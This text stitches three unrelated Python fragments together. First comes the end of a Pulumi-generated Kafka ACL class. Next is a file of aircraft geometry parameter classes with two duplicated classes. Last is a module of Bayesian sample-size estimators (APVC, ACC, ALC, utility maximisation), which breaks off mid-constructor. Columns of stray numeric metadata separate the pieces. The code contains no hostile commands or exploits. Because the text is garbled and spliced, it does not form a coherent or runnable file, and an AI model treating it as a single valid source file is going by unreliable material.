        __props__.__dict__["username"] = username
        return KafkaAcl(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter
    def permission(self) -> pulumi.Output[str]:
        """
        is the level of permission the matching users are given to the matching
        topics (admin, read, readwrite, write).
        """
        return pulumi.get(self, "permission")
    @property
    @pulumi.getter
    def project(self) -> pulumi.Output[str]:
        """
        and `service_name` - (Required) define the project and service the ACL belongs to.
        They should be defined using reference as shown above to set up dependencies correctly.
        These properties cannot be changed once the service is created. Doing so will result in
        the topic being deleted and new one created instead.
        """
        return pulumi.get(self, "project")
    @property
    @pulumi.getter(name="serviceName")
    def service_name(self) -> pulumi.Output[str]:
        """
        Service to link the Kafka ACL to
        """
        return pulumi.get(self, "service_name")
    @property
    @pulumi.getter
    def topic(self) -> pulumi.Output[str]:
        """
        is a topic name pattern the ACL entry matches to.
        """
        return pulumi.get(self, "topic")
    @property
    @pulumi.getter
    def username(self) -> pulumi.Output[str]:
        """
        is a username pattern the ACL entry matches to.
        """
        return pulumi.get(self, "username")
| 41.875312
| 134
| 0.630955
| 1,994
| 16,792
| 5.152959
| 0.089268
| 0.073869
| 0.09129
| 0.064234
| 0.823747
| 0.788029
| 0.768954
| 0.733431
| 0.723309
| 0.716788
| 0
| 0.000082
| 0.277573
| 16,792
| 400
| 135
| 41.98
| 0.846921
| 0.391853
| 0
| 0.584541
| 1
| 0
| 0.088681
| 0.003187
| 0
| 0
| 0
| 0
| 0
| 1
| 0.154589
| false
| 0.004831
| 0.024155
| 0
| 0.270531
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f205cfd8cf35b9d5516674b13bd5fdf34cb57f27
| 9,009
|
py
|
Python
|
aircraft_params.py
|
muratataturo/IAEA
|
2cf3ad4feed4ced0256f3f04ceb899ee12fa53a3
|
[
"MIT"
] | null | null | null |
aircraft_params.py
|
muratataturo/IAEA
|
2cf3ad4feed4ced0256f3f04ceb899ee12fa53a3
|
[
"MIT"
] | null | null | null |
aircraft_params.py
|
muratataturo/IAEA
|
2cf3ad4feed4ced0256f3f04ceb899ee12fa53a3
|
[
"MIT"
] | null | null | null |
import pandas as pd
# For computation
class AircraftParamsComputation(object):
    """
    Aircraft geometry/configuration parameter container (computation flavour).

    Loads the row named ``aircraft_name`` from a csv database and declares
    every geometric parameter used downstream.  All parameters start as
    ``None`` placeholders (units: ft or kg) except ``Vstall``.

    --Attributes--
    aircraft_name:
        type(string), row index of the aircraft in the database
    aircraft_database_path:
        type(string), path of the aircraft database csv
    """
    def __init__(self, aircraft_name, database_path="./DataBase/aircraft.csv"):
        """
        :param aircraft_name: name of the aircraft (must be a row index in the csv)
        :param database_path: path to the aircraft csv database; defaults to
                              the bundled "./DataBase/aircraft.csv"
        :raises KeyError: if ``aircraft_name`` is not present in the database
        """
        self.aircraft_name = aircraft_name
        # path of aircraft database (now parameterized instead of hard-coded)
        self.aircraft_database_path = database_path
        df = pd.read_csv(self.aircraft_database_path, index_col=0)
        print(df.columns)  # extract column
        print(df.loc[self.aircraft_name].values)  # extract numpy array from database
        # Initialize parameters
        # deal with following value by ft or kg
        # fuselage
        # fuselage is divided into three section(section1: cockpit, section2: cabin, section3: after cabin)
        self.cockpit_length = None  # l1
        self.cabin_length = None  # l2
        self.after_cabin_length = None  # l3
        self.fuselage_length = None  # l1 + l2 + l3
        self.cockpit_width = None  # w1
        self.cabin_width = None  # w2(df)
        self.after_cabin_width = None  # w3
        # Note: cockpit and after cabin shapes are circle
        self.cockpit_upper_height = None  # the height of upper part of cockpit
        self.cockpit_lower_height = None  # the height of lower part of cockpit
        self.cabin_upper_height = None  # the height of fuselage which contains passenger
        self.cabin_lower_height = None  # the height of fuselage which is determined by cargo fuselage
        self.after_cabin_upper_height = None  # the height of upper part of after cabin
        self.after_cabin_lower_height = None  # the height of lower part of after cabin
        # constant => 0.75 * ((1.0 + 2.0 * taper ratio) / (1.0 + taper ratio))
        #             * (main wing span * np.tan(25 * wingsweep_theta / fuselage length))
        self.KWs = None
        # main wing
        self.main_wing_span = None  # wing span(b)
        self.main_wing_aspect_ratio = None  # AR
        self.main_wing_taper_ratio = None  # t
        self.main_wing_tc = None  # the ratio of thickness and chord
        self.retreat_angle = None  # theta
        self.main_wing_croot = None  # the root chord of main wing
        self.main_wing_ctip = None  # the tip chord of main wing
        self.main_wing_area = None  # S
        # self.Nz = None  # ultimate load coefficient
        # vertical wing
        self.vertical_wing_span = None  # wing span(bv)
        self.vertical_wing_aspect_ratio = None  # ARv
        self.vertical_wing_taper_ratio = None  # tv
        self.vertical_wing_tc = None  # the ratio of thickness and chord at vertical wing
        self.vertical_retreat_angle = None  # thetav
        self.vertical_wing_croot = None  # the root chord of vertical wing
        self.vertical_wing_ctip = None  # the tip chord of vertical wing
        self.vertical_wing_area = None  # Sv
        # horizontal wing
        self.horizontal_wing_span = None  # wing span(bh)
        self.horizontal_wing_aspect_ratio = None  # ARh
        self.horizontal_wing_taper_ratio = None  # th
        self.horizontal_wing_tc = None  # the ratio of thickness and chord at horizontal wing
        self.horizontal_retreat_angle = None  # thetah
        self.horizontal_wing_croot = None  # the root chord of horizontal wing
        self.horizontal_wing_ctip = None  # the tip chord of horizontal wing
        self.horizontal_wing_area = None  # Sh
        # main landing gear
        self.main_landing_gear_position = None  # the setting position of main landing gear(Lm)
        self.number_of_main_wheel = None  # the number of main wheel
        self.number_of_main_gear_struts = None  # the number of main gear struts
        self.Vstall = 130  # stall velocity
        # Nose landing gear
        self.nose_landing_gear_position = None  # the setting position of nose landing gear(Ln)
        self.number_of_nose_wheel = None  # the number of nose wheel
        # Nacelle
        self.engine_number = None  # the number of jet engine
        # Engine Control
        self.engine_control_position = None  # the mounting position of engine control
        # Flight Control
        self.number_of_flight_control = None  # the number of flight control
        self.exposed_wing_span = None  # outer wing span (BW)
        # Instrument
        self.number_of_instrument = None  # the number of instrument, jet engine(2.0), UAV(0.5)
# For View
class AircraftParamsView(object):
    """
    Aircraft geometry/configuration parameter container (view flavour).

    Loads the row named ``aircraft_name`` from a csv database and declares
    every geometric parameter used downstream.  All parameters start as
    ``None`` placeholders (units: ft or kg) except ``Vstall``.

    NOTE(review): this class duplicates AircraftParamsComputation
    attribute-for-attribute; consider extracting a shared base class.

    --Attributes--
    aircraft_name:
        type(string), row index of the aircraft in the database
    aircraft_database_path:
        type(string), path of the aircraft database csv
    """
    def __init__(self, aircraft_name, database_path="./DataBase/aircraft.csv"):
        """
        :param aircraft_name: name of the aircraft (must be a row index in the csv)
        :param database_path: path to the aircraft csv database; defaults to
                              the bundled "./DataBase/aircraft.csv"
        :raises KeyError: if ``aircraft_name`` is not present in the database
        """
        self.aircraft_name = aircraft_name
        # path of aircraft database (now parameterized instead of hard-coded)
        self.aircraft_database_path = database_path
        df = pd.read_csv(self.aircraft_database_path, index_col=0)
        print(df.columns)  # extract column
        print(df.loc[self.aircraft_name].values)  # extract numpy array from database
        # Initialize parameters
        # deal with following value by ft or kg
        # fuselage
        # fuselage is divided into three section(section1: cockpit, section2: cabin, section3: after cabin)
        self.cockpit_length = None  # l1
        self.cabin_length = None  # l2
        self.after_cabin_length = None  # l3
        self.fuselage_length = None  # l1 + l2 + l3
        self.cockpit_width = None  # w1
        self.cabin_width = None  # w2(df)
        self.after_cabin_width = None  # w3
        # Note: cockpit and after cabin shapes are circle
        self.cockpit_upper_height = None  # the height of upper part of cockpit
        self.cockpit_lower_height = None  # the height of lower part of cockpit
        self.cabin_upper_height = None  # the height of fuselage which contains passenger
        self.cabin_lower_height = None  # the height of fuselage which is determined by cargo fuselage
        self.after_cabin_upper_height = None  # the height of upper part of after cabin
        self.after_cabin_lower_height = None  # the height of lower part of after cabin
        # constant => 0.75 * ((1.0 + 2.0 * taper ratio) / (1.0 + taper ratio))
        #             * (main wing span * np.tan(25 * wingsweep_theta / fuselage length))
        self.KWs = None
        # main wing
        self.main_wing_span = None  # wing span(b)
        self.main_wing_aspect_ratio = None  # AR
        self.main_wing_taper_ratio = None  # t
        self.main_wing_tc = None  # the ratio of thickness and chord
        self.retreat_angle = None  # theta
        self.main_wing_croot = None  # the root chord of main wing
        self.main_wing_ctip = None  # the tip chord of main wing
        self.main_wing_area = None  # S
        # self.Nz = None  # ultimate load coefficient
        # vertical wing
        self.vertical_wing_span = None  # wing span(bv)
        self.vertical_wing_aspect_ratio = None  # ARv
        self.vertical_wing_taper_ratio = None  # tv
        self.vertical_wing_tc = None  # the ratio of thickness and chord at vertical wing
        self.vertical_retreat_angle = None  # thetav
        self.vertical_wing_croot = None  # the root chord of vertical wing
        self.vertical_wing_ctip = None  # the tip chord of vertical wing
        self.vertical_wing_area = None  # Sv
        # horizontal wing
        self.horizontal_wing_span = None  # wing span(bh)
        self.horizontal_wing_aspect_ratio = None  # ARh
        self.horizontal_wing_taper_ratio = None  # th
        self.horizontal_wing_tc = None  # the ratio of thickness and chord at horizontal wing
        self.horizontal_retreat_angle = None  # thetah
        self.horizontal_wing_croot = None  # the root chord of horizontal wing
        self.horizontal_wing_ctip = None  # the tip chord of horizontal wing
        self.horizontal_wing_area = None  # Sh
        # main landing gear
        self.main_landing_gear_position = None  # the setting position of main landing gear(Lm)
        self.number_of_main_wheel = None  # the number of main wheel
        self.number_of_main_gear_struts = None  # the number of main gear struts
        self.Vstall = 130  # stall velocity
        # Nose landing gear
        self.nose_landing_gear_position = None  # the setting position of nose landing gear(Ln)
        self.number_of_nose_wheel = None  # the number of nose wheel
        # Nacelle
        self.engine_number = None  # the number of jet engine
        # Engine Control
        self.engine_control_position = None  # the mounting position of engine control
        # Flight Control
        self.number_of_flight_control = None  # the number of flight control
        self.exposed_wing_span = None  # outer wing span (BW)
        # Instrument
        self.number_of_instrument = None  # the number of instrument, jet engine(2.0), UAV(0.5)
# Smoke-test entry point: load the parameter set for a sample aircraft
# (requires ./DataBase/aircraft.csv with an "A320" row to be present).
if __name__ == '__main__':
    aircraft_name = "A320"
    ap = AircraftParamsComputation(aircraft_name)
| 42.098131
| 162
| 0.662116
| 1,214
| 9,009
| 4.712521
| 0.131796
| 0.056284
| 0.029366
| 0.031463
| 0.972907
| 0.972907
| 0.972907
| 0.972907
| 0.972907
| 0.972907
| 0
| 0.009951
| 0.274947
| 9,009
| 213
| 163
| 42.295775
| 0.865891
| 0.399711
| 0
| 0.948276
| 0
| 0
| 0.011143
| 0.008838
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017241
| false
| 0
| 0.008621
| 0
| 0.043103
| 0.034483
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f22074875d5aa2784e0e0d85aa42b3f1517361ff
| 32,000
|
py
|
Python
|
src/samplesizelib/linear/bayesian.py
|
andriygav/SampleSizeEstimation
|
079959711a46201e08ae3e0d41815bcb70d7efc4
|
[
"MIT"
] | 2
|
2020-08-16T18:24:05.000Z
|
2021-12-04T11:52:24.000Z
|
src/samplesizelib/linear/bayesian.py
|
andriygav/SampleSizeEstimation
|
079959711a46201e08ae3e0d41815bcb70d7efc4
|
[
"MIT"
] | 2
|
2020-08-16T17:53:49.000Z
|
2020-08-18T19:57:40.000Z
|
src/samplesizelib/linear/bayesian.py
|
andriygav/SampleSizeEstimation
|
079959711a46201e08ae3e0d41815bcb70d7efc4
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
The :mod:`samplesizelib.linear.bayesian` contains classes:
- :class:`samplesizelib.linear.bayesian.APVCEstimator`
- :class:`samplesizelib.linear.bayesian.ACCEstimator`
- :class:`samplesizelib.linear.bayesian.ALCEstimator`
- :class:`samplesizelib.linear.bayesian.MaxUtilityEstimator`
- :class:`samplesizelib.linear.bayesian.KLEstimator`
"""
from __future__ import print_function
__docformat__ = 'restructuredtext'
from multiprocessing import Pool
import numpy as np
import scipy.stats as sps
from scipy.optimize import minimize_scalar
from ..shared.estimator import SampleSizeEstimator
from ..shared.utils import Dataset
class APVCEstimator(SampleSizeEstimator):
    r"""
    Description of APVC Method (Average Posterior Variance Criterion).

    For a grid of subset sizes ``m`` it repeatedly fits ``statmodel`` on
    random subsamples and scores the dispersion of the Laplace-approximated
    parameter posterior; ``m*`` is the smallest grid size whose average
    score falls below ``epsilon``.

    :param statmodel: the machine learning algorithm
    :type statmodel: RegressionModel or LogisticModel
    :param averaging: number of random subsamples scored per subset size
    :type averaging: int
    :param epsilon: dispersion threshold defining a "sufficient" sample size
    :type epsilon: float
    :param begin: smallest subset size of the grid (default: 2 * n_features)
    :type begin: int
    :param end: largest subset size of the grid (default: dataset size - 1)
    :type end: int
    :param num: step between consecutive subset sizes in the grid
    :type num: int
    :param multiprocess: if True, score subsamples in a multiprocessing Pool
    :type multiprocess: bool
    :param progressbar: if True, wrap the size grid in a progress bar
    :type progressbar: bool
    """
    def __init__(self, statmodel, **kwards):
        r"""Constructor method
        """
        super().__init__()
        self.statmodel = statmodel
        # Pop and validate each supported keyword; anything left in kwards
        # afterwards is an unknown parameter and is rejected at the end.
        self.averaging = int(kwards.pop('averaging', 100))
        if self.averaging <= 0:
            raise ValueError(
                "The averaging should be positive but get {}".format(
                    self.averaging))
        self.epsilon = kwards.pop('epsilon', 0.5)
        if self.epsilon <= 0:
            raise ValueError(
                "The epsilon must be positive value but get {}".format(
                    self.epsilon))
        # begin/end may stay None here; forward() derives defaults from the
        # dataset and re-validates the resolved values.
        self.begin = kwards.pop('begin', None)
        if self.begin is not None and self.begin < 0:
            raise ValueError(
                "The begin must be positive value but get {}".format(
                    self.begin))
        self.end = kwards.pop('end', None)
        if self.end is not None and self.end < 0:
            raise ValueError(
                "The end must be positive value but get {}".format(
                    self.end))
        if self.end is not None and self.begin is not None and self.end <= self.begin:
            raise ValueError(
                "The end value must be greater than the begin value but {}<={}".format(
                    self.end, self.begin))
        self.num = kwards.pop('num', 5)
        if self.num <=0:
            raise ValueError(
                "The num must be positive value but get {}".format(
                    self.num))
        if self.end is not None and self.begin is not None and self.num >= self.end - self.begin:
            raise ValueError(
                "The num value must be smaler than (end - begin) but {}>={}".format(
                    self.num, self.end - self.begin))
        self.multiprocess = kwards.pop('multiprocess', False)
        if not isinstance(self.multiprocess, bool):
            raise ValueError(
                "The multiprocess must be bool value but get {}".format(
                    self.multiprocess))
        self.progressbar = kwards.pop('progressbar', False)
        if not isinstance(self.progressbar, bool):
            raise ValueError(
                "The progressbar must be bool value but get {}".format(
                    self.progressbar))
        if kwards:
            raise ValueError("Invalid parameters: %s" % str(kwards))
        # Set lazily by forward(); also makes the instance picklable for Pool.
        self.dataset = None
    def _hDispersion(self, dataset):
        r"""
        Return the APVC dispersion score of the parameter posterior fitted
        on *dataset*: sqrt(sum((eigvals(cov)/2)**2)).
        """
        X, y = dataset.sample()
        w_hat = self.statmodel(y, X).fit()
        # 0.01*I regularizes the negative Hessian before inversion
        # (Laplace approximation of the posterior covariance).
        cov = np.linalg.inv(
            0.01*np.eye(w_hat.shape[0]) - self.statmodel(y, X).hessian(w_hat))
        return np.sqrt(np.sum((np.linalg.eigvals(cov)/2)**2))
    def _score_subsample(self, m):
        r"""
        Return the dispersion score for one random subsample of size ``m``.
        """
        X_m, y_m = self.dataset.sample(m)
        dataset_m = Dataset(X_m, y_m)
        return self._hDispersion(dataset_m)
    def forward(self, features, target):
        r"""
        Returns sample size prediction for the given dataset.
        :param features: The tensor of shape
            `num_elements` :math:`\times` `num_feature`.
        :type features: array.
        :param target: The tensor of shape `num_elements`.
        :type target: array.
        :return: sample size estimation for the given dataset.
        :rtype: dict
        """
        self.dataset = Dataset(features, target)
        # Resolve the grid bounds: defaults depend on the dataset, so the
        # constructor could not validate them fully.
        if self.end is None:
            end = len(self.dataset) - 1
        else:
            end = self.end
        if self.begin is None:
            begin = 2*self.dataset.n
        else:
            begin = self.begin
        if end <= begin:
            raise ValueError(
                "The end value must be greater than the begin value but {}<={}".format(
                    end, begin))
        if self.num >= end - begin:
            raise ValueError(
                "The num value must be smaler than (end - begin) but {}>={}".format(
                    self.num, end - begin))
        subset_sizes = np.arange(begin, end, self.num, dtype=np.int64)
        list_of_answers = []
        # m*points_one repeats each size `averaging` times for the map below.
        points_one = np.ones(self.averaging, dtype=np.int64)
        if self.multiprocess:
            pool = Pool()
            mapping = pool.map
        else:
            mapping = map
        if self.progressbar:
            iterator = self._progressbar(subset_sizes)
        else:
            iterator = subset_sizes
        for i, m in enumerate(iterator):
            list_of_answers.append(
                np.asarray(
                    list(mapping(self._score_subsample, m*points_one))))
            self._set_status(100.*(i+1)/len(subset_sizes))
        if self.multiprocess:
            pool.close()
            pool.join()
        list_of_answers = np.asarray(list_of_answers)
        list_of_E = np.mean(list_of_answers, axis = 1)
        list_of_S = np.std(list_of_answers, axis = 1)
        m_size = end
        # Scan from the largest size down, remembering the smallest size with
        # mean score below epsilon.  NOTE(review): there is no `break` when
        # the condition fails, so a non-monotone dip at a small m still wins;
        # confirm this is the intended definition of m*.
        for m, mean in zip(reversed(subset_sizes), reversed(list_of_E)):
            if mean < self.epsilon:
                m_size = m
        return {'m*': m_size,
                'E': np.array(list_of_E),
                'S': np.array(list_of_S),
                'm': np.array(subset_sizes),
                }
class ACCEstimator(SampleSizeEstimator):
    r"""
    Description of ACC Method (Average Coverage Criterion).

    For a grid of subset sizes ``m`` it repeatedly fits ``statmodel`` on
    random subsamples and Monte-Carlo-estimates how much posterior mass
    lies inside a ball of radius ``3*length``; ``m*`` is the smallest grid
    size whose average coverage exceeds ``1 - alpha``.

    :param statmodel: the machine learning algorithm
    :type statmodel: RegressionModel or LogisticModel
    :param averaging: number of random subsamples scored per subset size
    :type averaging: int
    :param alpha: 1 - alpha is the target posterior coverage
    :type alpha: float
    :param length: sets the coverage ball radius (radius = 3 * length)
    :type length: float
    :param begin: smallest subset size of the grid (default: 2 * n_features)
    :type begin: int
    :param end: largest subset size of the grid (default: dataset size - 1)
    :type end: int
    :param num: step between consecutive subset sizes in the grid
    :type num: int
    :param multiprocess: if True, score subsamples in a multiprocessing Pool
    :type multiprocess: bool
    :param progressbar: if True, wrap the size grid in a progress bar
    :type progressbar: bool
    """
    def __init__(self, statmodel, **kwards):
        r"""Constructor method
        """
        super().__init__()
        self.statmodel = statmodel
        # Pop and validate each supported keyword; anything left in kwards
        # afterwards is an unknown parameter and is rejected at the end.
        self.averaging = int(kwards.pop('averaging', 100))
        if self.averaging <= 0:
            raise ValueError(
                "The averaging should be positive but get {}".format(
                    self.averaging))
        self.length = kwards.pop('length', 0.25)
        if self.length <= 0:
            raise ValueError(
                "The length must be positive value but get {}".format(
                    self.length))
        self.alpha = kwards.pop('alpha', 0.05)
        if self.alpha < 0 or self.alpha > 1:
            raise ValueError(
                "The alpha must be between 0 and 1 but get {}".format(
                    self.alpha))
        # begin/end may stay None here; forward() derives defaults from the
        # dataset and re-validates the resolved values.
        self.begin = kwards.pop('begin', None)
        if self.begin is not None and self.begin < 0:
            raise ValueError(
                "The begin must be positive value but get {}".format(
                    self.begin))
        self.end = kwards.pop('end', None)
        if self.end is not None and self.end < 0:
            raise ValueError(
                "The end must be positive value but get {}".format(
                    self.end))
        if self.end is not None and self.begin is not None and self.end <= self.begin:
            raise ValueError(
                "The end value must be greater than the begin value but {}<={}".format(
                    self.end, self.begin))
        self.num = kwards.pop('num', 5)
        if self.num <=0:
            raise ValueError(
                "The num must be positive value but get {}".format(
                    self.num))
        if self.end is not None and self.begin is not None and self.num >= self.end - self.begin:
            raise ValueError(
                "The num value must be smaler than (end - begin) but {}>={}".format(
                    self.num, self.end - self.begin))
        self.multiprocess = kwards.pop('multiprocess', False)
        if not isinstance(self.multiprocess, bool):
            raise ValueError(
                "The multiprocess must be bool value but get {}".format(
                    self.multiprocess))
        self.progressbar = kwards.pop('progressbar', False)
        if not isinstance(self.progressbar, bool):
            raise ValueError(
                "The progressbar must be bool value but get {}".format(
                    self.progressbar))
        if kwards:
            raise ValueError("Invalid parameters: %s" % str(kwards))
        # Set lazily by forward(); also makes the instance picklable for Pool.
        self.dataset = None
    def _iDistribution(self, dataset):
        r"""
        Return the Monte-Carlo estimate (1000 draws) of the posterior mass
        inside the ball of radius 3*length.  NOTE(review): the draws are
        centred at zero (mean=0), not at w_hat — confirm this is intended.
        """
        X, y = dataset.sample()
        w_hat = self.statmodel(y, X).fit()
        # 0.01*I regularizes the negative Hessian before inversion
        # (Laplace approximation of the posterior covariance).
        cov = np.linalg.inv(
            0.01*np.eye(w_hat.shape[0]) - self.statmodel(y, X).hessian(w_hat))
        W = sps.multivariate_normal(mean=np.zeros(w_hat.shape[0]), cov = cov).rvs(size=1000)
        return (np.sqrt((W**2).sum(axis=1)) < 3*self.length).mean()
    def _score_subsample(self, m):
        r"""
        Return the coverage estimate for one random subsample of size ``m``.
        """
        X_m, y_m = self.dataset.sample(m)
        dataset_m = Dataset(X_m, y_m)
        return self._iDistribution(dataset_m)
    def forward(self, features, target):
        r"""
        Returns sample size prediction for the given dataset.
        :param features: The tensor of shape
            `num_elements` :math:`\times` `num_feature`.
        :type features: array.
        :param target: The tensor of shape `num_elements`.
        :type target: array.
        :return: sample size estimation for the given dataset.
        :rtype: dict
        """
        self.dataset = Dataset(features, target)
        # Resolve the grid bounds: defaults depend on the dataset, so the
        # constructor could not validate them fully.
        if self.end is None:
            end = len(self.dataset) - 1
        else:
            end = self.end
        if self.begin is None:
            begin = 2*self.dataset.n
        else:
            begin = self.begin
        if end <= begin:
            raise ValueError(
                "The end value must be greater than the begin value but {}<={}".format(
                    end, begin))
        if self.num >= end - begin:
            raise ValueError(
                "The num value must be smaler than (end - begin) but {}>={}".format(
                    self.num, end - begin))
        subset_sizes = np.arange(begin, end, self.num, dtype=np.int64)
        list_of_answers = []
        # m*points_one repeats each size `averaging` times for the map below.
        points_one = np.ones(self.averaging, dtype=np.int64)
        if self.multiprocess:
            pool = Pool()
            mapping = pool.map
        else:
            mapping = map
        if self.progressbar:
            iterator = self._progressbar(subset_sizes)
        else:
            iterator = subset_sizes
        for i, m in enumerate(iterator):
            list_of_answers.append(
                np.asarray(
                    list(mapping(self._score_subsample, m*points_one))))
            self._set_status(100.*(i+1)/len(subset_sizes))
        if self.multiprocess:
            pool.close()
            pool.join()
        list_of_answers = np.asarray(list_of_answers)
        list_of_E = np.mean(list_of_answers, axis = 1)
        list_of_S = np.std(list_of_answers, axis = 1)
        m_size = end
        # Scan from the largest size down, remembering the smallest size with
        # coverage above 1 - alpha.  NOTE(review): there is no `break` when
        # the condition fails, so a non-monotone dip at a small m still wins;
        # confirm this is the intended definition of m*.
        for m, mean in zip(reversed(subset_sizes), reversed(list_of_E)):
            if mean > 1 - self.alpha:
                m_size = m
        return {'m*': m_size,
                'E': np.array(list_of_E),
                'S': np.array(list_of_S),
                'm': np.array(subset_sizes),
                }
class ALCEstimator(SampleSizeEstimator):
    r"""
    Average Length Criterion (ALC) method for sample size estimation.

    For a grid of subset sizes the parameter posterior is approximated by
    a Laplace approximation and the radius of the ``1 - alpha`` credible
    ball is estimated by Monte-Carlo.  The returned sample size is the
    smallest one for which the averaged radius drops below ``length``.

    :param statmodel: the machine learning algorithm
    :type statmodel: RegressionModel or LogisticModel
    :param averaging: number of subsamples scored per subset size
    :type averaging: int
    :param alpha: tail mass left outside the credible ball
    :type alpha: float
    :param length: target radius of the credible ball
    :type length: float
    :param begin: smallest subset size (default ``2 * num_features``)
    :type begin: int
    :param end: largest subset size (default ``len(dataset) - 1``)
    :type end: int
    :param num: step between consecutive subset sizes
    :type num: int
    :param multiprocess: score subsamples in a multiprocessing pool
    :type multiprocess: bool
    :param progressbar: display progress while scoring
    :type progressbar: bool
    """
    def __init__(self, statmodel, **kwards):
        r"""Constructor method
        """
        super().__init__()
        self.statmodel = statmodel
        self.averaging = int(kwards.pop('averaging', 100))
        if self.averaging <= 0:
            raise ValueError(
                "The averaging should be positive but get {}".format(
                    self.averaging))
        self.length = kwards.pop('length', 0.5)
        if self.length <= 0:
            raise ValueError(
                "The length must be positive value but get {}".format(
                    self.length))
        self.alpha = kwards.pop('alpha', 0.05)
        if self.alpha < 0 or self.alpha > 1:
            raise ValueError(
                "The alpha must be between 0 and 1 but get {}".format(
                    self.alpha))
        self.begin = kwards.pop('begin', None)
        if self.begin is not None and self.begin < 0:
            raise ValueError(
                "The begin must be positive value but get {}".format(
                    self.begin))
        self.end = kwards.pop('end', None)
        if self.end is not None and self.end < 0:
            raise ValueError(
                "The end must be positive value but get {}".format(
                    self.end))
        if self.end is not None and self.begin is not None \
                and self.end <= self.begin:
            raise ValueError(
                "The end value must be greater than the begin value but {}<={}".format(
                    self.end, self.begin))
        self.num = kwards.pop('num', 5)
        if self.num <= 0:
            raise ValueError(
                "The num must be positive value but get {}".format(
                    self.num))
        if self.end is not None and self.begin is not None \
                and self.num >= self.end - self.begin:
            raise ValueError(
                "The num value must be smaler than (end - begin) but {}>={}".format(
                    self.num, self.end - self.begin))
        self.multiprocess = kwards.pop('multiprocess', False)
        if not isinstance(self.multiprocess, bool):
            raise ValueError(
                "The multiprocess must be bool value but get {}".format(
                    self.multiprocess))
        self.progressbar = kwards.pop('progressbar', False)
        if not isinstance(self.progressbar, bool):
            raise ValueError(
                "The progressbar must be bool value but get {}".format(
                    self.progressbar))
        # Anything left in kwards is an unsupported keyword argument.
        if kwards:
            raise ValueError("Invalid parameters: %s" % str(kwards))
        self.dataset = None

    def _aDistribution(self, dataset):
        r"""
        Estimate the credible-ball radius for one dataset.

        The model is fitted once; its regularized Hessian gives a Laplace
        covariance from which 1000 parameter vectors are drawn.  A bounded
        scalar search then finds the radius ``r`` whose tail mass outside
        ``3 * r`` is closest to ``alpha``.
        """
        X, y = dataset.sample()
        # Build the model once; previously two separate instances were
        # constructed (one for fit(), one for hessian()).
        model = self.statmodel(y, X)
        w_hat = model.fit()
        # Small ridge (0.01 * I) keeps the matrix invertible.
        cov = np.linalg.inv(
            0.01*np.eye(w_hat.shape[0]) - model.hessian(w_hat))
        W = sps.multivariate_normal(
            mean=np.zeros(w_hat.shape[0]), cov=cov).rvs(size=1000)
        function = lambda r: np.abs(
            (np.sqrt((W**2).sum(axis=1)) > 3*r).mean() - self.alpha)
        return minimize_scalar(function, bounds=(0.01, 1), method='Bounded',
                               options={'maxiter': 10})['x']

    def _score_subsample(self, m):
        r"""
        Draw one random subsample of size ``m`` and score it with
        :meth:`_aDistribution`.
        """
        X_m, y_m = self.dataset.sample(m)
        return self._aDistribution(Dataset(X_m, y_m))

    def forward(self, features, target):
        r"""
        Returns sample size prediction for the given dataset.

        :param features: The tensor of shape
            `num_elements` :math:`\times` `num_feature`.
        :type features: array.
        :param target: The tensor of shape `num_elements`.
        :type target: array.
        :return: dict with keys ``'m*'`` (estimated sample size), ``'E'``
            and ``'S'`` (mean/std of the scores per subset size) and
            ``'m'`` (the grid of subset sizes).
        :rtype: dict
        """
        self.dataset = Dataset(features, target)
        # Resolve the search range, falling back to data-driven defaults.
        end = len(self.dataset) - 1 if self.end is None else self.end
        begin = 2*self.dataset.n if self.begin is None else self.begin
        if end <= begin:
            raise ValueError(
                "The end value must be greater than the begin value but {}<={}".format(
                    end, begin))
        if self.num >= end - begin:
            raise ValueError(
                "The num value must be smaler than (end - begin) but {}>={}".format(
                    self.num, end - begin))
        subset_sizes = np.arange(begin, end, self.num, dtype=np.int64)
        points_one = np.ones(self.averaging, dtype=np.int64)
        pool = Pool() if self.multiprocess else None
        mapping = map if pool is None else pool.map
        iterator = (self._progressbar(subset_sizes)
                    if self.progressbar else subset_sizes)
        list_of_answers = []
        try:
            for i, m in enumerate(iterator):
                list_of_answers.append(
                    np.asarray(
                        list(mapping(self._score_subsample, m*points_one))))
                self._set_status(100.*(i+1)/len(subset_sizes))
        finally:
            # BUG FIX: release the worker processes even if scoring raises;
            # previously an exception leaked the pool.
            if pool is not None:
                pool.close()
                pool.join()
        list_of_answers = np.asarray(list_of_answers)
        list_of_E = np.mean(list_of_answers, axis=1)
        list_of_S = np.std(list_of_answers, axis=1)
        # Smallest subset size whose averaged radius is already below
        # `length`; fall back to `end` when no size qualifies.
        m_size = end
        for m, mean in zip(reversed(subset_sizes), reversed(list_of_E)):
            if mean < self.length:
                m_size = m
        return {'m*': m_size,
                'E': np.array(list_of_E),
                'S': np.array(list_of_S),
                'm': np.array(subset_sizes),
                }
class MaxUtilityEstimator(SampleSizeEstimator):
    r"""
    Utility Maximisation method for sample size estimation.

    For a grid of subset sizes a Monte-Carlo estimate of the expected
    per-sample log joint (likelihood plus Gaussian prior) is computed,
    penalized by a linear acquisition cost ``c * m``.  The subset size
    maximizing this utility is returned.

    :param statmodel: the machine learning algorithm
    :type statmodel: RegressionModel or LogisticModel
    :param averaging: number of subsamples scored per subset size
    :type averaging: int
    :param c: per-observation acquisition cost
    :type c: float
    :param begin: smallest subset size (default ``2 * num_features``)
    :type begin: int
    :param end: largest subset size (default ``len(dataset) - 1``)
    :type end: int
    :param num: step between consecutive subset sizes
    :type num: int
    :param multiprocess: score subsamples in a multiprocessing pool
    :type multiprocess: bool
    :param progressbar: display progress while scoring
    :type progressbar: bool
    """
    def __init__(self, statmodel, **kwards):
        r"""Constructor method
        """
        super().__init__()
        self.statmodel = statmodel
        self.averaging = int(kwards.pop('averaging', 100))
